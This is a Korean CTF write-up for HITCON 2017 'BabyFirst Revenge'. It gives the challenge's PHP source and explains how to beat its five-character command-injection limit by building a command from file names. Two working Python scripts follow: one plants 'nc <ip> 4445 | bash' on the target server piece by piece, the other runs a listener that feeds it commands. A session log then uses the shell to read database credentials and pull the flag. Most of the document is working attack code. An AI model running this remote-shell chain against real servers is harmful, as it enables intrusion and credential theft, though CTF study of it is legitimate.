HITCON CTF 2017 - BabyFirst Revenge (172 pts.)

문제 소스 :

1
2
3
4
5
6
7
8
9
10
<?php
$sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) {
@exec($_GET['cmd']);
} else if (isset($_GET['reset'])) {
@exec('/bin/rm -rf ' . $sandbox);
}
highlight_file(__FILE__);

명령어를 5글자만 입력할 수 있다. 파일 이름들을 ‘l\\’, ‘s\\’이런 식으로 만들고 ‘ls>>\\’하게 되면

1
2
3
4
5
6
\
l\
s\
\
-\
l\

이렇게 명령어를 만들어서 sh \로 실행할 수 있다.

make.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import requests
import socket
import struct

def ip2long(ip):
return struct.unpack("!L", socket.inet_aton(ip))[0]

def cmd_req(t):
url = 'http://52.199.204.34/?cmd=' + t
requests.get(url)
print url

ip = requests.get('https://ipapi.co/ip/').text

requests.get('http://52.199.204.34/?reset')

cmd = 'nc {} 4445 | bash'.format(ip2long(ip))

for ch in cmd:
if not ch.isalpha():
cmd_req('>\\{}\\'.format(ch))
else:
cmd_req('>{}\\\\'.format(ch))

cmd_req('ls>>\\')
cmd_req('rm ??')

shell.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
from socket import *
import hashlib
import requests
import thread

def server(s):
while True:
connection, client_address = s.accept()
connection.send(cmd + "> result")
connection.close()

s = socket(AF_INET, SOCK_STREAM)
s.bind(('', 4445))
s.listen(1)

thread.start_new_thread(server, (s,))
ip = requests.get('https://ipapi.co/ip/').text

name = hashlib.md5("orange" + ip).hexdigest()

while True:
cmd = raw_input("# ")
requests.get('http://52.199.204.34/?cmd=sh \\\\')
print requests.get('http://52.199.204.34/sandbox/{}/result'.format(name)).text

실행하게 되면 쉘을 획득할 수 있게 된다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~ % python make.py
~ % python shell.py
# cat /home/fl4444g/README.txt
Flag is in the MySQL database
fl4444g / SugZXUtgeJ52_Bvr


# mysql -ufl4444g -pSugZXUtgeJ52_Bvr -e "show databases;"
Database
information_schema
fl4gdb

# mysql -ufl4444g -pSugZXUtgeJ52_Bvr -e "use fl4gdb; show tables;"
Tables_in_fl4gdb
this_is_the_fl4g

# mysql -ufl4444g -pSugZXUtgeJ52_Bvr -e "use fl4gdb; select * from this_is_the_fl4g;"
secret
hitcon{idea_from_phith0n,thank_you:)}
Share